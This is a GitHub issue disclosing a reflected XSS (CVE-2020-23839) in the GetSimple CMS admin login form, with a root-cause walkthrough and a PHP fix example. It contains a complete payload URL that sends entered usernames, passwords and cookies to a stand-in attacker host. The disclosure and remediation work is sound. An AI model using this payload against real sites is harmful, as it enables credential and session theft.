CVE-2020-23839: Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' · Issue #1330 · GetSimpleCMS/GetSimpleCMS

A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client’s browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.


It's your myself(false) function (defined in basic.php) that is echoed into the form action.

  • This easily shows the issue when you assign the result to a variable.

Analysis

  • Add a variable to capture the result of the echo myself(false) call that is injected into the form action.

  • Set a breakpoint on lines 32 and 33 of the /admin/index.php page.

  • Step into the myself() function. When its argument is false, it returns:

return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);

  • See here that:

$_SERVER['PHP_SELF'] = "/admin/index.php/breakout"

  • The PHP function basename() "Returns trailing name component of path":

https://www.php.net/manual/en/function.basename.php

  • Since no GET arguments are sent in the request:

$_SERVER['QUERY_STRING'] = ""

As a final result, we end up with:

The resulting "breakout?" is HTML-encoded, but since it is already inside the form's action attribute, any JavaScript placed there will execute when the form is posted.

The '?' at the end presents some initial complications, but it can be discarded as a comment by appending '//' (URL-encoded).

The HTML encoding can also be bypassed: since the payload is JavaScript, decodeURIComponent() can be used to recover any character needed.

Example Payload to steal username and password:

http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentials and session to a remote attacker!");window.location.replace("test");%2f%2f
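To make the root cause and the fix concrete, here is an added PHP example (not GetSimple's own code) that models the myself(false) return shown above beside a hardened replacement. It assumes, as the issue describes, that PHP_SELF carries any path info appended after index.php, while SCRIPT_NAME holds only the path of the script actually executed; the $server array is a constructed request, not a real capture.

```php
<?php
// Added example, not GetSimple's code: models the vulnerable myself(false)
// return statement from the issue and a hardened alternative.

// Vulnerable shape: PHP_SELF includes request path info, so basename()
// returns the attacker-supplied trailing segment instead of "index.php".
// htmlentities() does not help here: the browser decodes the attribute
// value before treating it as the form's action URL.
function myself_vulnerable(array $server): string
{
    return htmlentities(basename($server['PHP_SELF']), ENT_QUOTES);
}

// Hardened: build the action from SCRIPT_NAME (the executed script, which
// carries no path info) and allow only the expected script name. Anything
// else falls back to a fixed value, so the request cannot steer the action.
function myself_hardened(array $server): string
{
    $name = basename($server['SCRIPT_NAME'] ?? '');
    if ($name !== 'index.php') {
        $name = 'index.php';
    }
    return htmlentities($name, ENT_QUOTES);
}

// Constructed request (assumption): the "breakout" segment from the issue
// appended as path info after /admin/index.php, no query string.
$server = [
    'SCRIPT_NAME'  => '/admin/index.php',
    'PHP_SELF'     => '/admin/index.php/breakout',
    'QUERY_STRING' => '',
];

printf("vulnerable action: %s\n", myself_vulnerable($server));
printf("hardened action:   %s\n", myself_hardened($server));
```

Run with `php example.php`: the vulnerable function yields the path-info segment as the form action, the hardened one always yields index.php. A simpler fix still is to hard-code the action rather than deriving it from the request at all.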
